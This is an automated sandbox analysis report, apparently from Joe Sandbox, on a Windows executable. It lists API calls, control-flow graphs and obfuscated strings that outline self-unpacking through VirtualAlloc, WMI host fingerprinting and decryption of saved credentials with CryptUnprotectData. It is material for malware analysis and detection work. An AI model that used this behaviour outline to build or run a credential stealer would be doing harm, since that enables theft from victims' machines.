                                                                            MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Disassembly

                                                                            Reset < >

                                                                              Execution Graph

                                                                              Execution Coverage:2.9%
                                                                              Dynamic/Decrypted Code Coverage:22.3%
                                                                              Signature Coverage:50.8%
                                                                              Total number of Nodes:130
                                                                              Total number of Limit Nodes:12
                                                                              execution_graph 24907 408a60 24909 408a6f 24907->24909 24908 408d05 ExitProcess 24909->24908 24910 408cf7 24909->24910 24911 408a84 GetCurrentProcessId GetCurrentThreadId 24909->24911 24926 442000 FreeLibrary 24910->24926 24913 408ac3 SHGetSpecialFolderPathW GetForegroundWindow 24911->24913 24914 408abd 24911->24914 24915 408b95 24913->24915 24914->24913 24915->24915 24922 4404b0 24915->24922 24917 408c27 24918 408cee 24917->24918 24925 40d400 CoInitializeEx 24917->24925 24918->24910 24927 443770 24922->24927 24924 4404ba RtlAllocateHeap 24924->24917 24926->24908 24928 4437a0 24927->24928 24928->24924 24928->24928 24850 4423c5 GetForegroundWindow 24854 444110 24850->24854 24852 4423d1 GetForegroundWindow 24853 4423ec 24852->24853 24855 444124 24854->24855 24855->24852 24934 40daa3 24935 40dad0 24934->24935 24938 43d0d0 24935->24938 24937 40dc55 24939 43d120 24938->24939 24939->24939 24940 43d529 CoCreateInstance 24939->24940 24941 43d585 SysAllocString 24940->24941 24942 43db6d 24940->24942 24945 43d62c 24941->24945 24944 43db7d GetVolumeInformationW 24942->24944 24951 43db9b 24944->24951 24946 43d634 CoSetProxyBlanket 24945->24946 24947 43db5c SysFreeString 24945->24947 24948 43db52 24946->24948 24949 43d654 SysAllocString 24946->24949 24947->24942 24948->24947 24952 43d740 24949->24952 24951->24937 24952->24952 24953 43d764 SysAllocString 24952->24953 24955 43d78a 24953->24955 24954 43db39 SysFreeString SysFreeString 24954->24948 24955->24954 24956 43db2f 24955->24956 24957 43d7ce VariantInit 24955->24957 24956->24954 24958 43d850 24957->24958 24958->24958 24959 43db1e VariantClear 24958->24959 24959->24956 24960 418ba2 24962 418c10 24960->24962 24961 418fb7 24961->24961 24962->24961 24963 445260 LdrInitializeThunk 24962->24963 24963->24962 24964 4404e2 24965 4404f0 24964->24965 24966 4404f2 24964->24966 24967 4404f7 RtlFreeHeap 24966->24967 24968 4180f0 24968->24968 24970 4180f8 24968->24970 24969 418468 CryptUnprotectData 24970->24969 24856 421710 24858 42171e 24856->24858 24861 421778 24856->24861 24858->24858 24862 421830 24858->24862 24863 421840 24862->24863 24863->24863 24866 445260 24863->24866 24865 421971 24867 445280 24866->24867 24868 44536e 24867->24868 24870 442080 LdrInitializeThunk 24867->24870 24868->24865 24870->24868 24971 20e003c 24972 20e0049 24971->24972 24986 20e0e0f SetErrorMode SetErrorMode 24972->24986 24977 20e0265 24978 20e02ce VirtualProtect 24977->24978 24980 20e030b 24978->24980 24979 20e0439 VirtualFree 24984 20e05f4 LoadLibraryA 24979->24984 24985 20e04be 24979->24985 24980->24979 24981 20e04e3 LoadLibraryA 24981->24985 24983 20e08c7 24984->24983 24985->24981 24985->24984 24987 20e0223 24986->24987 24988 20e0d90 24987->24988 24989 20e0dad 24988->24989 24990 20e0dbb GetPEB 24989->24990 24991 20e0238 VirtualAlloc 24989->24991 24990->24991 24991->24977 24992 421b30 25004 4450f0 24992->25004 24994 42228c 24995 421b77 24995->24994 24996 4404b0 RtlAllocateHeap 24995->24996 24997 421bd2 24996->24997 25003 421be9 24997->25003 25008 442080 LdrInitializeThunk 24997->25008 24999 4404b0 RtlAllocateHeap 24999->25003 25000 421cb9 25000->24994 25010 442080 LdrInitializeThunk 25000->25010 25003->24999 25003->25000 25009 442080 LdrInitializeThunk 25003->25009 25005 445110 25004->25005 25006 445208 25005->25006 25011 442080 LdrInitializeThunk 25005->25011 25006->24995 25008->24997 25009->25003 25010->25000 25011->25006 25012 40d433 CoInitializeSecurity 24871 445450 24872 445469 24871->24872 24873 44548f 24871->24873 24872->24873 24877 442080 LdrInitializeThunk 24872->24877 24875 4454b8 24875->24873 24878 442080 LdrInitializeThunk 24875->24878 24877->24875 24878->24873 25013 4425f2 25014 44261e 25013->25014 25015 442602 25013->25015 25015->25014 25017 442080 LdrInitializeThunk 25015->25017 25017->25014 24889 5e0000 24892 5e0006 24889->24892 24893 5e0015 24892->24893 24896 5e07a6 24893->24896 24897 5e07c1 24896->24897 24898 5e07ca CreateToolhelp32Snapshot 24897->24898 24899 5e07e6 Module32First 24897->24899 24898->24897 24898->24899 24900 5e07f5 24899->24900 24902 5e0005 24899->24902 24903 5e0465 24900->24903 24904 5e0490 24903->24904 24905 5e04d9 24904->24905 24906 5e04a1 VirtualAlloc 24904->24906 24905->24905 24906->24905 25023 40ebff 25024 40ec5f 25023->25024 25025 40ec7e 25023->25025 25024->25025 25030 442080 LdrInitializeThunk 25024->25030 25026 40ed2e 25025->25026 25029 442080 LdrInitializeThunk 25025->25029 25029->25026 25030->25025 25031 442b3b 25032 442b45 25031->25032 25033 442c0e 25032->25033 25035 442080 LdrInitializeThunk 25032->25035 25035->25033

                                                                              Executed Functions

                                                                              Function 0043D0D0 Relevance: 32.5, APIs: 11, Strings: 7, Instructions: 957memorycomCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 0 43d0d0-43d112 1 43d120-43d18e 0->1 1->1 2 43d190-43d1b6 1->2 3 43d1c0-43d1f8 2->3 3->3 4 43d1fa-43d25f 3->4 5 43d260-43d289 4->5 5->5 6 43d28b-43d2a8 5->6 8 43d2ae-43d2b8 6->8 9 43d3bd-43d3d5 6->9 10 43d2c0-43d31d 8->10 11 43d3e0-43d3ff 9->11 10->10 12 43d31f-43d349 10->12 11->11 13 43d401-43d47b 11->13 14 43d350-43d3af 12->14 15 43d480-43d4c0 13->15 14->14 16 43d3b1-43d3b5 14->16 15->15 17 43d4c2-43d51f 15->17 16->9 18 43d520-43d527 17->18 18->18 19 43d529-43d57f CoCreateInstance 18->19 20 43d585-43d5d5 19->20 21 43db6d-43db99 call 443b60 GetVolumeInformationW 19->21 22 43d5e0-43d605 20->22 26 43dba2-43dba4 21->26 27 43db9b-43db9e 21->27 22->22 24 43d607-43d62e SysAllocString 22->24 32 43d634-43d64e CoSetProxyBlanket 24->32 33 43db5c-43db69 SysFreeString 24->33 28 43dbc7-43dbd2 26->28 27->26 30 43dbd4-43dbdb 28->30 31 43dbde-43dc0b 28->31 30->31 34 43dc10-43dc6a 31->34 35 43db52-43db58 32->35 36 43d654-43d67f 32->36 33->21 34->34 37 43dc6c-43dc97 34->37 35->33 38 43d680-43d6a5 36->38 39 43dca0-43dcdc 37->39 38->38 40 43d6a7-43d732 SysAllocString 38->40 39->39 41 43dcde-43dd02 call 41dce0 39->41 42 43d740-43d762 40->42 46 43dd10-43dd17 41->46 42->42 44 43d764-43d78c SysAllocString 42->44 49 43d792-43d7b4 44->49 50 43db39-43db4e SysFreeString * 2 44->50 46->46 48 43dd19-43dd2c 46->48 51 43dd32-43dd45 call 408430 48->51 52 43dbb0-43dbc1 48->52 56 43d7ba-43d7bd 49->56 57 43db2f-43db35 49->57 50->35 51->52 52->28 54 43dd4a-43dd51 52->54 56->57 59 43d7c3-43d7c8 56->59 57->50 59->57 60 43d7ce-43d843 VariantInit 59->60 61 43d850-43d8d3 60->61 61->61 62 43d8d9-43d8f2 61->62 63 43d8f6-43d8fb 62->63 64 43d901-43d90a 63->64 65 43db1e-43db2b VariantClear 63->65 64->65 66 43d910-43d91f 64->66 65->57 67 43d921-43d926 66->67 68 43d95d 66->68 70 43d93c-43d940 67->70 69 43d95f-43d97d call 408270 68->69 79 43d983-43d997 69->79 80 43dac9-43dada 69->80 72 43d942-43d94b 70->72 73 43d930 70->73 76 43d952-43d956 72->76 77 43d94d-43d950 72->77 75 43d931-43d93a 73->75 75->69 75->70 76->75 78 43d958-43d95b 76->78 77->75 78->75 79->80 81 43d99d-43d9a3 79->81 82 43dae1-43daf2 80->82 83 43dadc 80->83 84 43d9b0-43d9ba 81->84 85 43daf4 82->85 86 43daf9-43db1b call 4082a0 call 408280 82->86 83->82 87 43d9d0-43d9d6 84->87 88 43d9bc-43d9c1 84->88 85->86 86->65 91 43d9f5-43da07 87->91 92 43d9d8-43d9db 87->92 90 43da60-43da76 88->90 95 43da79-43da7f 90->95 97 43da8b-43da94 91->97 98 43da0d-43da10 91->98 92->91 96 43d9dd-43d9f3 92->96 95->80 100 43da81-43da83 95->100 96->90 101 43da96-43da98 97->101 102 43da9a-43da9d 97->102 98->97 103 43da12-43da5f 98->103 100->84 104 43da89 100->104 101->95 105 43dac5-43dac7 102->105 106 43da9f-43dac3 102->106 103->90 104->80 105->90 106->90
                                                                              APIs
                                                                              • CoCreateInstance.OLE32(80838290,00000000,00000001,?,00000000), ref: 0043D572
                                                                              • SysAllocString.OLEAUT32 ref: 0043D608
                                                                              • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0043D646
                                                                              • SysAllocString.OLEAUT32 ref: 0043D6A8
                                                                              • SysAllocString.OLEAUT32 ref: 0043D765
                                                                              • VariantInit.OLEAUT32(?), ref: 0043D7D6
                                                                              • SysFreeString.OLEAUT32(00000000), ref: 0043DB5D
                                                                              • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 0043DB95
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID: String$Alloc$BlanketCreateFreeInformationInitInstanceProxyVariantVolume
                                                                              • String ID: fF$CfF$[B$[J$tu$yv${pqv
                                                                              • API String ID: 505850577-1972840126
                                                                              • Opcode ID: 0933b6900e20eb3ffd80477a97ad3530cb39ed5c2e1d64840ee4302b7984fe47
                                                                              • Instruction ID: dd13a90e2492ac68040bcad17eea3e7c9d23fbfdc89757e028f71a1dea91b727
                                                                              • Opcode Fuzzy Hash: 0933b6900e20eb3ffd80477a97ad3530cb39ed5c2e1d64840ee4302b7984fe47
                                                                              • Instruction Fuzzy Hash: 94621372A183108FE314CF68D88576BBBE1EFD5314F198A2DE4D58B390D7799809CB86
                                                                              Function 00421B30 Relevance: 9.3, Strings: 7, Instructions: 527COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 195 421b30-421b7c call 4450f0 198 421b82-421bda call 414c00 call 4404b0 195->198 199 4222dd-4222ed 195->199 205 421bdc-421be7 198->205 206 421be9 205->206 207 421bee-421c03 205->207 208 421ca1-421ca9 206->208 209 421c05 207->209 210 421c0a-421c16 207->210 213 421cab 208->213 214 421cad-421cb7 208->214 211 421c92-421c95 209->211 210->211 212 421c18-421c88 call 442080 210->212 218 421c97 211->218 219 421c99-421c9c 211->219 222 421c8d 212->222 213->214 215 421cb9 214->215 216 421cbe-421cce 214->216 220 422272-422282 call 4404d0 215->220 221 421cd0-421cf0 216->221 218->208 219->205 232 422284-42228a 220->232 223 421f61 221->223 224 421cf6-421d16 221->224 222->211 226 421f63-421f66 223->226 227 421d1b-421d26 224->227 229 421f68-421f6c 226->229 230 421f6e-421f84 call 4404b0 226->230 227->227 231 421d28-421d2a 227->231 233 421f9c-421f9e 229->233 247 421f86-421f9a 230->247 248 421f88-421f93 230->248 235 421d2e-421d31 231->235 236 42228e-4222a2 232->236 237 42228c 232->237 241 421fa4-421fc0 233->241 242 42224b-422250 233->242 239 421d37-421db7 235->239 240 421dbc-421de3 call 4222f0 235->240 243 4222a6-4222ad 236->243 244 4222a4 236->244 237->199 239->235 262 421de5 240->262 263 421dea-421e22 240->263 250 421fc5-421fd0 241->250 245 422252-42225a 242->245 246 42225c-422260 242->246 251 4222cd-4222d0 243->251 252 4222af-4222c8 call 442080 243->252 244->251 254 422262 245->254 246->254 247->233 258 422264-422268 248->258 250->250 260 421fd2-421fd6 250->260 255 4222d2-4222d4 251->255 256 4222d6-4222db 251->256 252->251 254->258 255->199 256->232 258->221 261 42226e-422270 258->261 264 421fd8-421fdb 260->264 261->220 262->223 266 421e27-421e35 263->266 267 42200f-422027 264->267 268 421fdd-42200d 264->268 266->266 270 421e37 266->270 269 42202e-422039 267->269 268->264 272 422040-422059 269->272 273 42203b 269->273 271 421e39-421e3c 270->271 274 421eaa-421ec4 call 4222f0 271->274 275 421e3e-421ea8 271->275 277 422060-42206c 272->277 278 42205b 272->278 276 42210e-422116 273->276 291 421ec6-421eca 274->291 292 421ecf-421ee6 274->292 275->271 282 42211a-422179 276->282 283 422118 276->283 280 4220fd-422102 277->280 281 422072-4220f3 call 442080 277->281 278->280 286 422106-422109 280->286 287 422104 280->287 293 4220f8 281->293 288 42217b-42217e 282->288 283->282 286->269 287->276 289 4221d2-4221e2 288->289 290 422180-4221d0 288->290 294 4221e4-4221e8 289->294 295 422218-42221b 289->295 290->288 291->226 296 421eea-421f5f call 408270 call 414850 call 408280 292->296 297 421ee8 292->297 293->280 298 4221ea-4221f1 294->298 300 422234-42223a 295->300 301 42221d-422232 call 4404d0 295->301 296->226 297->296 302 4221f3-4221ff 298->302 303 422201-42220a 298->303 306 42223c-42223f 300->306 301->306 302->298 307 42220e 303->307 308 42220c 303->308 306->242 311 422241-422249 306->311 312 422214-422216 307->312 308->312 311->258 312->295
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID: AllocateHeap
                                                                              • String ID: !@$,$0$6$p$q$v
                                                                              • API String ID: 1279760036-585546663
                                                                              • Opcode ID: 68ded5a1127ff787cf997603004e9156167bbfc9199ee1ec6ad3b0f1b8bf95cb
                                                                              • Instruction ID: 8656d014051cfeae6f38fc6e5bc27d53fcdcc23dc9b32e8d9396b3c6709607b7
                                                                              • Opcode Fuzzy Hash: 68ded5a1127ff787cf997603004e9156167bbfc9199ee1ec6ad3b0f1b8bf95cb
                                                                              • Instruction Fuzzy Hash: 0122DD7170C790CFD3248B28D58036BBBE1BB95324F558A2EE5E9873D1D7B988418B4B
                                                                              Function 00408A60 Relevance: 7.7, APIs: 5, Instructions: 216threadCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 317 408a60-408a71 call 4416b0 320 408d05-408d07 ExitProcess 317->320 321 408a77-408a7e call 43a2c0 317->321 324 408d00 call 442000 321->324 325 408a84-408abb GetCurrentProcessId GetCurrentThreadId 321->325 324->320 327 408ac3-408b93 SHGetSpecialFolderPathW GetForegroundWindow 325->327 328 408abd-408ac1 325->328 329 408b95-408bb7 327->329 330 408bdc-408bef 327->330 328->327 332 408bb9-408bbb 329->332 333 408bbd-408bda 329->333 331 408bf0-408c1c 330->331 331->331 334 408c1e-408c4a call 4404b0 331->334 332->333 333->330 337 408c50-408c8b 334->337 338 408cc4-408ce2 call 40a170 337->338 339 408c8d-408cc2 337->339 342 408ce4 call 40d400 338->342 343 408cee-408cf5 338->343 339->337 346 408ce9 call 40c050 342->346 343->324 345 408cf7-408cfd call 408280 343->345 345->324 346->343
                                                                              APIs
                                                                              • GetCurrentProcessId.KERNEL32 ref: 00408A84
                                                                              • GetCurrentThreadId.KERNEL32 ref: 00408A8E
                                                                              • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 00408B76
                                                                              • GetForegroundWindow.USER32 ref: 00408B8B
                                                                              • ExitProcess.KERNEL32 ref: 00408D07
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                              • String ID:
                                                                              • API String ID: 4063528623-0
                                                                              • Opcode ID: ba99a32a84df6074fc1a326d170a01607909a1aa19cc5cd935f515b9d2d4cca7
                                                                              • Instruction ID: 695b1043c619777a8863990e744e8888075fa37916c6100b3e536846f602c71f
                                                                              • Opcode Fuzzy Hash: ba99a32a84df6074fc1a326d170a01607909a1aa19cc5cd935f515b9d2d4cca7
                                                                              • Instruction Fuzzy Hash: E3616873B143140BD318AE799C1635AB6D39BC5314F0F863EA995EB7D1ED7888068389
                                                                              Function 0040C080 Relevance: 6.4, Strings: 5, Instructions: 104COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 350 40c080-40c2df 351 40c2e0-40c315 350->351 351->351 352 40c317-40c323 351->352 353 40c326-40c343 352->353
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 50$DM_e$FwPq$Js$'!
                                                                              • API String ID: 0-1711485358
                                                                              • Opcode ID: c4c1f8e28e835abe653d42ead9130a3bdb40cd1f355abcf11e9a7fb6b3c4c5b3
                                                                              • Instruction ID: a29f9b67a002a0f45ebf0d2c5d73cf8b9506a9b5be0e3ba76b97c1ae1caaee17
                                                                              • Opcode Fuzzy Hash: c4c1f8e28e835abe653d42ead9130a3bdb40cd1f355abcf11e9a7fb6b3c4c5b3
                                                                              • Instruction Fuzzy Hash: C751DAB45493808FE334CF21C991B8BBBB1BBA1304F609A0CE6D95B654CB759446CF97
                                                                              Function 00418BA2 Relevance: 5.4, Strings: 4, Instructions: 367COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 354 418ba2-418c02 355 418c10-418c4c 354->355 355->355 356 418c4e-418c6e call 401dd0 355->356 359 418da0-418da6 call 408280 356->359 360 419040-419049 call 401f60 356->360 361 418d83-418d9c 356->361 362 418fa3-418fb0 356->362 363 418fe6-419010 call 41bdd0 356->363 364 418da9-418dba 356->364 365 419030 356->365 366 419050-419056 call 401f60 356->366 367 418c75-418ccb 356->367 368 418dd4-418de9 call 401e00 356->368 369 418fb7-418fc5 356->369 370 419018-419021 call 408280 356->370 371 41903a 356->371 359->364 360->366 375 418dbd-418dcd call 401df0 361->375 362->359 362->360 362->363 362->364 362->365 362->366 362->369 362->370 378 41905f-4195af 362->378 363->370 364->375 365->371 366->378 372 418cd0-418cf4 367->372 395 418e50 368->395 396 418deb-418df0 368->396 379 418fe1 369->379 380 418fc7-418fcf 369->380 370->365 371->360 372->372 384 418cf6-418d79 call 41bdd0 372->384 375->359 375->360 375->362 375->363 375->364 375->365 375->366 375->368 375->369 375->370 375->371 375->378 379->363 391 418fd0-418fdf 380->391 384->361 391->379 391->391 399 418e52-418e55 395->399 398 418e09-418e0b 396->398 400 418e00 398->400 401 418e0d-418e1e 398->401 402 418e60 399->402 403 418e57-418e5c 399->403 405 418e01-418e07 400->405 401->400 406 418e20-418e38 401->406 404 418e67-418eb2 call 408270 call 40aff0 402->404 403->404 413 418ec0-418ec2 404->413 414 418eb4-418eb9 404->414 405->398 405->399 406->400 408 418e3a-418e46 406->408 408->405 410 418e48-418e4b 408->410 410->405 415 418ec9-418ee4 call 408270 413->415 414->415 418 418f01-418f2f 415->418 419 418ee6-418eeb 415->419 421 418f30-418f4a 418->421 420 418ef0-418eff 419->420 420->418 420->420 421->421 422 418f4c-418f60 421->422 423 418f81-418f8f call 445260 422->423 424 418f62-418f67 422->424 427 418f94-418f9c 423->427 425 418f70-418f7f 424->425 425->423 425->425 427->359 427->360 427->362 427->363 427->364 427->365 427->366 427->369 427->370 427->378
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: PWPQ$bd\,$fnga$oQ
                                                                              • API String ID: 0-3706350231
                                                                              • Opcode ID: fe0c42c07420c9bbc5d61f49a80fd29d9882301a9105f023342265155b572c4c
                                                                              • Instruction ID: e34152e6636813154928bb160b9fd2834c9c91dba41fdab838839377217cf8bd
                                                                              • Opcode Fuzzy Hash: fe0c42c07420c9bbc5d61f49a80fd29d9882301a9105f023342265155b572c4c
                                                                              • Instruction Fuzzy Hash: 1CC126766083408FD7258F24C8557AB77E6EFC6314F08892EE8998B391EF388841C787
                                                                              Function 00422370 Relevance: 4.2, Strings: 3, Instructions: 457COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 428 422370-422384 429 42238a-4223df 428->429 430 42286f-42287b 428->430 431 4223e0-422459 429->431 431->431 432 42245b-4224a3 call 441650 431->432 435 4224b0-4224c4 432->435 435->435 436 4224c6-422508 435->436 437 422510-422524 436->437 437->437 438 422526-422578 437->438 439 422580-422594 438->439 439->439 440 422596-4225d9 call 443b60 439->440 443 4225dc-4225e5 440->443 444 4225e7-4225fc 443->444 445 42264f-422651 443->445 447 422656-422658 444->447 448 4225fe-422603 444->448 445->430 449 422865-42286b 447->449 450 422610-422619 448->450 449->430 450->450 451 42261b-42262a 450->451 452 422630-422639 451->452 452->452 453 42263b-422646 452->453 454 422648-42264d 453->454 455 42265d 453->455 456 42265f-422670 call 408270 454->456 455->456 459 422672-422677 456->459 460 422691-4226a5 456->460 461 422680-42268f 459->461 462 4226b0-4226d3 460->462 461->460 461->461 462->462 463 4226d5-4226e7 462->463 464 422701-422715 463->464 465 4226e9-4226ef 463->465 468 422717-422727 464->468 469 422778-42277a 464->469 466 4226f0-4226ff 465->466 466->464 466->466 468->469 472 422729-422749 468->472 470 422852-422862 call 408280 469->470 470->449 472->469 477 42274b-42275a 472->477 478 422760-422769 477->478 478->478 479 42276b-42276f 478->479 480 422771-422776 479->480 481 42277f 479->481 482 422781-422792 call 408270 480->482 481->482 485 4227b1-4227c2 482->485 486 422794-422799 482->486 488 4227d0-4227e4 485->488 487 4227a0-4227af 486->487 487->485 487->487 488->488 489 4227e6-4227ff 488->489 490 422822-42284f call 4219a0 call 408280 489->490 491 422801-422804 489->491 490->470 492 422810-422820 491->492 492->490 492->492
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: -jkhanold~m`$anold~m`$d~m`
                                                                              • API String ID: 0-185452761
                                                                              • Opcode ID: d49d82f6dee0b69ccdeb9ac9c72559ba4ec1d23df509649ca449329d3e76b77d
                                                                              • Instruction ID: c4d8edb6bc4b196318c262ba746bf01715a487006edf2819d48878c0ea44a364
                                                                              • Opcode Fuzzy Hash: d49d82f6dee0b69ccdeb9ac9c72559ba4ec1d23df509649ca449329d3e76b77d
                                                                              • Instruction Fuzzy Hash: C8D1BBB06083509FD710DF68D892B6BBBE0FF85318F54491DE8958B392E7B8D809CB56
                                                                              Function 005E07A6 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 497 5e07a6-5e07bf 498 5e07c1-5e07c3 497->498 499 5e07ca-5e07d6 CreateToolhelp32Snapshot 498->499 500 5e07c5 498->500 501 5e07d8-5e07de 499->501 502 5e07e6-5e07f3 Module32First 499->502 500->499 501->502 507 5e07e0-5e07e4 501->507 503 5e07fc-5e0804 502->503 504 5e07f5-5e07f6 call 5e0465 502->504 508 5e07fb 504->508 507->498 507->502 508->503
                                                                              APIs
                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 005E07CE
                                                                              • Module32First.KERNEL32(00000000,00000224), ref: 005E07EE
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1878168519.00000000005E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_5e0000_rdFy6abQ61.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                              • String ID:
                                                                              • API String ID: 3833638111-0
                                                                              • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                              • Instruction ID: f7a6780e9fa88dfbf35f1815424aa3f9e674ffdcbdbb02a1b37934ab44102016
                                                                              • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                              • Instruction Fuzzy Hash: 7EF062311017116BD7243BB6A88DA6F7AE8FF49765F101528E682910C0DAB0F8864A61
                                                                              Function 00415D89 Relevance: 1.6, APIs: 1, Instructions: 141COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 562 415d89 563 4182c9 562->563 564 4182cb-4182d1 562->564 563->564 564->563 565 4182d3-4182fb 564->565 566 418302 565->566 567 4182fd-418300 565->567 568 418303-41830f 566->568 567->566 567->568 569 418311-418314 568->569 570 418316 568->570 569->570 571 418317-41832d call 408270 569->571 570->571 574 418423-418463 call 443b60 571->574 575 418333-41833a 571->575 579 418468-418488 CryptUnprotectData 574->579 576 418353-41839c call 41d040 * 2 575->576 583 418340-41834d 576->583 584 41839e-4183b5 call 41d040 576->584 583->574 583->576 584->583 587 4183b7-4183df 584->587 587->583 588 4183e5-4183ff call 41d040 587->588 588->583 591 418405-41841e 588->591 591->583
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: dbee84ecd3790633f2c83826065bd30b531f242f0a5518141b0bd449406d4866
                                                                              • Instruction ID: fe71d1bcebcc68b075db47888e1e2cba677fa4d5c187ad294acff22be9a80e62
                                                                              • Opcode Fuzzy Hash: dbee84ecd3790633f2c83826065bd30b531f242f0a5518141b0bd449406d4866
                                                                              • Instruction Fuzzy Hash: 1B51B9B16086428FC714CF58C4917ABF7E2ABD5304F18892EE4EA87342E739DD45CB86
                                                                              Function 00442080 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LdrInitializeThunk.NTDLL(0044523A,00000002,00000018,?,?,00000018,?,?,?), ref: 004420AE
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                              • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                              • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                              • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                              Function 0040D172 Relevance: 1.4, Strings: 1, Instructions: 132COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
